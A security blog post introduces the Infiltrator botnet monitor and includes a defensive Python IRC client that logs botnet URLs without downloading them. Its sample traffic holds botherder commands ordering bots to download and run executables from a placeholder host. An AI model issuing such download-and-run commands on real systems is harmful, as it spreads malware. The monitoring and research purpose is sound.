Infiltrator Botnet Monitor
Usually the first question asked by someone who is interested in botnet monitoring is, "What do you use to monitor botnets?"
New hunters tend to start by watching IRC networks, then move up to HTTP, P2P, etc. Many new hunters try to use off-the-shelf IRC clients, until they realize the bloat really isn't worth it and that monitoring more than a dozen nets that way is practically impossible. Furthermore, monitoring custom IRCds with an RFC-compliant client will likely raise the botherder's suspicions: a normal client sends things a bot never does (CTCP VERSION replies, MODE and WHO queries, a real username and realname), and a custom server or an attentive herder can spot that.
A friend (Magictao) found a newer client called Infiltrator and passed it my way. Infiltrator is a Python script written by zeroq. It should run on both Windows and *nix, and it lets you monitor several botnets at once with very little bloat. We use something similar here at DISOG.
Paul has not had a chance to review the code yet, and my Python is very weak, but I could not see anything too dangerous. Just remember that this client will download URLs seen in the IRC traffic. Please do what you can to protect yourself from accidental execution of any downloaded malware: run it in an isolated VM with no outbound network path other than the IRC server, and keep whatever it fetches somewhere it cannot be run by mistake (a non-executable filename and a directory your tools will not auto-open is a good start). I ran the client for an hour or so this evening, and it did everything as advertised. It's missing documentation, but if you have a few minutes, give it a shot!
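To make the "lightweight client" idea concrete, here is an added example of the core a monitor like this needs; it is not Infiltrator's code and not anything from zeroq or DISOG. It parses raw IRC lines, answers PINGs, joins channels on the welcome reply, and records every URL it sees in messages and topics. Unlike Infiltrator it deliberately does not fetch those URLs; it only names a quarantine file for them, so the decision to download happens in your isolated VM and nowhere else. The nick `scan01`, the channel `#sploit`, the `.download` command and the 203.0.113.7 host are constructed sample traffic, not a capture.

```python
import hashlib
import re
import socket
from dataclasses import dataclass, field

# Anything that looks like a download location in bot chatter.
URL_RE = re.compile(r'(?:https?|ftp)://[^\s<>"\']+', re.IGNORECASE)


@dataclass
class IrcMessage:
    prefix: str
    command: str
    params: list


def parse_irc_line(line):
    """Split one raw IRC line (RFC 1459 framing) into prefix, command, params.
    The trailing parameter (after ' :') is kept whole, including spaces."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    if " :" in line:
        head, _, trailing = line.partition(" :")
        params = head.split() + [trailing]
    else:
        params = line.split()
    command = params.pop(0) if params else ""
    return IrcMessage(prefix, command.upper(), params)


@dataclass
class MonitorSession:
    """Protocol state for one botnet connection. feed() takes inbound lines
    and returns the lines to send back; it records URLs but never fetches."""
    nick: str
    channels: list
    joined: bool = False
    urls: list = field(default_factory=list)   # (channel, sender, url)
    log: list = field(default_factory=list)    # (target, sender, text)

    def handshake(self):
        # Minimal registration only: no CTCP VERSION replies, no MODE or WHO,
        # nothing a bot would not send itself (see the point about RFC clients).
        return [f"NICK {self.nick}", f"USER {self.nick} 0 * :{self.nick}"]

    def feed(self, raw_line):
        msg = parse_irc_line(raw_line)
        out = []
        if msg.command == "PING":
            out.append("PONG :" + (msg.params[0] if msg.params else ""))
        elif msg.command == "001" and not self.joined:      # RPL_WELCOME
            out.extend(f"JOIN {c}" for c in self.channels)
            self.joined = True
        elif msg.command in ("PRIVMSG", "NOTICE", "TOPIC", "332"):
            sender = msg.prefix.split("!", 1)[0]
            target = msg.params[0] if msg.params else ""
            if msg.command == "332" and len(msg.params) >= 2:  # RPL_TOPIC: nick, channel, topic
                target = msg.params[1]
            text = msg.params[-1] if msg.params else ""
            self.log.append((target, sender, text))
            for url in URL_RE.findall(text):
                if url not in [u for _, _, u in self.urls]:   # record each URL once
                    self.urls.append((target, sender, url))
        return out


def quarantine_name(url):
    """Name for a sample fetched from url: hash-based so nothing in the
    quarantine directory carries an extension that could launch it."""
    return hashlib.sha256(url.encode()).hexdigest()[:16] + ".bin.quarantine"


def run(host, port, session, timeout=300):
    """Drive one session over a real socket; returns the URLs seen when the
    link drops. Run this only from an isolated VM (assumed, not enforced here)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        for line in session.handshake():
            sock.sendall((line + "\r\n").encode())
        buf = b""
        while True:
            data = sock.recv(4096)
            if not data:
                break
            buf += data
            while b"\n" in buf:
                raw, buf = buf.split(b"\n", 1)
                for reply in session.feed(raw.decode("utf-8", "replace")):
                    sock.sendall((reply + "\r\n").encode())
    return session.urls


# Constructed sample traffic for an offline run; not a real capture.
SAMPLE_LINES = [
    ":irc.example.net 001 scan01 :Welcome",
    "PING :irc.example.net",
    ":irc.example.net 332 scan01 #sploit :.dl http://203.0.113.7/upd.exe 1",
    ":herder!h@10.0.0.1 PRIVMSG #sploit :.download http://203.0.113.7/bot.exe c:\\bot.exe 1",
    ":herder!h@10.0.0.1 PRIVMSG #sploit :.download http://203.0.113.7/bot.exe c:\\bot.exe 1",
]


def demo():
    """Feed the sample lines through one session; returns (replies, urls)."""
    s = MonitorSession(nick="scan01", channels=["#sploit"])
    replies = [r for line in SAMPLE_LINES for r in s.feed(line)]
    return replies, s.urls


if __name__ == "__main__":
    replies, urls = demo()
    print("sent:", replies)
    for chan, who, url in urls:
        print(f"{chan} {who} {url} -> {quarantine_name(url)}")
```

Monitoring several nets at once is then one `MonitorSession` per server driven from a `selectors`-based loop instead of the blocking `run()` above; the protocol logic stays the same because it never touches the socket.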
Labels: Botnet monitoring, Infiltrator, Python
